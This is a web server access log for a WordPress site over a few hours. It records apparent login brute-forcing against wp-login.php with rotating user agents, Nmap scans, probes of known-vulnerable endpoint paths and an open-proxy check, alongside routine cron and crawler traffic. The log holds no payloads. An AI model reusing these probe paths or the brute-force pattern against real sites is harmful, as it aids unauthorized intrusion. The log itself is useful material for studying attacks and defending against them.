77.90.185.240 - - [23/Dec/2025:21:13:49 +0800] "POST /wp-login.php HTTP/1.1" 200 2989 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
77.90.185.240 - - [23/Dec/2025:21:13:52 +0800] "POST /wp-login.php HTTP/1.1" 200 2984 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
77.90.185.240 - - [23/Dec/2025:21:13:54 +0800] "POST /wp-login.php HTTP/1.1" 200 2902 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
77.90.185.240 - - [23/Dec/2025:21:13:57 +0800] "POST /wp-login.php HTTP/1.1" 200 2988 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
77.90.185.240 - - [23/Dec/2025:21:14:00 +0800] "POST /wp-login.php HTTP/1.1" 200 2990 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
77.90.185.240 - - [23/Dec/2025:21:14:02 +0800] "POST /wp-login.php HTTP/1.1" 200 2987 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:120.0) Gecko/20100101 Firefox/120.0"
77.90.185.240 - - [23/Dec/2025:21:14:05 +0800] "POST /wp-login.php HTTP/1.1" 200 2931 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
77.90.185.240 - - [23/Dec/2025:21:14:07 +0800] "POST /wp-login.php HTTP/1.1" 200 2931 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
77.90.185.240 - - [23/Dec/2025:21:14:10 +0800] "POST /wp-login.php HTTP/1.1" 200 2983 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
77.90.185.240 - - [23/Dec/2025:21:14:12 +0800] "POST /wp-login.php HTTP/1.1" 200 2983 "http://CQQIZHOU.COM/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Dec/2025:21:16:05 +0800] "POST /wp-cron.php?doing_wp_cron=1766495765.5865991115570068359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
52.167.144.65 - - [23/Dec/2025:21:16:05 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.74 - - [23/Dec/2025:21:16:10 +0800] "GET /?s=2026 HTTP/1.1" 200 17761 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [23/Dec/2025:21:18:10 +0800] "POST /wp-cron.php?doing_wp_cron=1766495889.9940938949584960937500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
95.214.55.71 - - [23/Dec/2025:21:18:10 +0800] "GET /login.asp HTTP/1.1" 301 5 "-" "-"
204.76.203.212 - - [23/Dec/2025:21:18:33 +0800] "GET / HTTP/1.1" 200 33678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.244.226.47 - - [23/Dec/2025:21:35:15 +0800] "GET /2160/ HTTP/1.1" 200 29448 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
36.133.115.36 - - [23/Dec/2025:21:53:14 +0800] "POST /wp-cron.php?doing_wp_cron=1766497994.7843780517578125000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [23/Dec/2025:21:53:15 +0800] "GET / HTTP/1.1" 200 33678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Dec/2025:21:56:16 +0800] "POST /wp-cron.php?doing_wp_cron=1766498176.7855908870697021484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
5.187.35.158 - - [23/Dec/2025:21:56:16 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
141.98.11.140 - - [23/Dec/2025:21:56:31 +0800] "GET / HTTP/1.1" 200 152290 "-" "-"
36.133.115.36 - - [23/Dec/2025:21:58:59 +0800] "POST /wp-cron.php?doing_wp_cron=1766498339.9491209983825683593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
95.214.55.71 - - [23/Dec/2025:21:59:00 +0800] "GET / HTTP/1.1" 200 33678 "-" "-"
204.76.203.219 - - [23/Dec/2025:21:59:37 +0800] "GET / HTTP/1.1" 200 33678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Dec/2025:22:27:42 +0800] "POST /wp-cron.php?doing_wp_cron=1766500062.1238780021667480468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
121.43.54.30 - - [23/Dec/2025:22:27:42 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
36.133.115.36 - - [23/Dec/2025:22:27:52 +0800] "POST /wp-cron.php?doing_wp_cron=1766500072.9361228942871093750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
121.43.54.30 - - [23/Dec/2025:22:27:52 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
121.43.54.30 - - [23/Dec/2025:22:27:53 +0800] "GET /nmaplowercheck1766500068 HTTP/1.1" 404 31364 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
121.43.54.30 - - [23/Dec/2025:22:27:53 +0800] "POST /sdk HTTP/1.1" 404 31364 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
121.43.54.30 - - [23/Dec/2025:22:27:53 +0800] "GET /evox/about HTTP/1.1" 404 31364 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
121.43.54.30 - - [23/Dec/2025:22:27:53 +0800] "GET /HNAP1 HTTP/1.1" 404 31364 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
121.43.54.30 - - [23/Dec/2025:22:28:13 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
121.43.54.30 - - [23/Dec/2025:22:28:13 +0800] "GET / HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [23/Dec/2025:22:38:56 +0800] "POST /wp-cron.php?doing_wp_cron=1766500736.1943891048431396484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
44.223.61.94 - - [23/Dec/2025:22:38:56 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
198.244.226.104 - - [23/Dec/2025:22:43:31 +0800] "GET /2159/ HTTP/1.1" 200 28635 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
36.133.115.36 - - [23/Dec/2025:22:46:41 +0800] "POST /wp-cron.php?doing_wp_cron=1766501201.7462511062622070312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
167.94.138.116 - - [23/Dec/2025:22:46:41 +0800] "GET /sitemap.xml HTTP/1.1" 200 500 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [23/Dec/2025:22:49:31 +0800] "POST /wp-cron.php?doing_wp_cron=1766501371.0434598922729492187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
36.133.108.119 - - [23/Dec/2025:22:49:31 +0800] "HEAD / HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36"
36.133.115.36 - - [23/Dec/2025:22:51:36 +0800] "POST /wp-cron.php?doing_wp_cron=1766501496.0277409553527832031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
167.94.138.126 - - [23/Dec/2025:22:51:36 +0800] "GET /security.txt HTTP/1.1" 200 19623 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [23/Dec/2025:22:54:07 +0800] "POST /wp-cron.php?doing_wp_cron=1766501647.3831150531768798828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
162.142.125.47 - - [23/Dec/2025:22:54:07 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
36.133.115.36 - - [23/Dec/2025:22:55:19 +0800] "POST /wp-cron.php?doing_wp_cron=1766501719.7673931121826171875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
87.121.84.57 - - [23/Dec/2025:22:55:21 +0800] "GET / HTTP/1.1" 200 152290 "-" "Mozilla/1.0"
36.133.115.36 - - [23/Dec/2025:22:57:41 +0800] "POST /wp-cron.php?doing_wp_cron=1766501861.1499559879302978515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.212 - - [23/Dec/2025:22:57:41 +0800] "GET / HTTP/1.1" 200 33678 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.114.89.255 - - [23/Dec/2025:23:07:11 +0800] "GET /cn/webuploader/server/preview.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
36.133.115.36 - - [23/Dec/2025:23:22:18 +0800] "POST /wp-cron.php?doing_wp_cron=1766503338.0076239109039306640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
38.46.221.123 - - [23/Dec/2025:23:22:18 +0800] "GET http://check.9tb.org/ HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
38.46.221.123 - - [23/Dec/2025:23:22:18 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 39568 "http://check.9tb.org" "Go-http-client/1.1"
51.195.215.168 - - [23/Dec/2025:23:30:30 +0800] "GET /2361/ HTTP/1.1" 200 24943 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
198.244.240.48 - - [23/Dec/2025:23:31:55 +0800] "GET /wp-content/uploads/2025/12/1766373840-Article_images_20251220.webp HTTP/1.1" 200 40034 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.38.147.46 - - [23/Dec/2025:23:31:57 +0800] "GET /wp-content/uploads/2025/12/1766373833-Article_images_20251219.webp HTTP/1.1" 200 79910 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
36.133.115.36 - - [23/Dec/2025:23:39:50 +0800] "POST /wp-cron.php?doing_wp_cron=1766504390.3408379554748535156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
20.221.69.50 - - [23/Dec/2025:23:39:50 +0800] "GET /developmentserver/metadatauploader HTTP/1.1" 404 8980 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [23/Dec/2025:23:41:18 +0800] "POST /wp-cron.php?doing_wp_cron=1766504478.7645521163940429687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
95.214.55.71 - - [23/Dec/2025:23:41:19 +0800] "GET / HTTP/1.1" 200 109837 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
36.133.115.36 - - [23/Dec/2025:23:44:20 +0800] "POST /wp-cron.php?doing_wp_cron=1766504660.5586578845977783203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
180.153.236.52 - - [23/Dec/2025:23:44:20 +0800] "GET / HTTP/1.1" 200 33678 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Mobile Safari/537.36; 360Spider"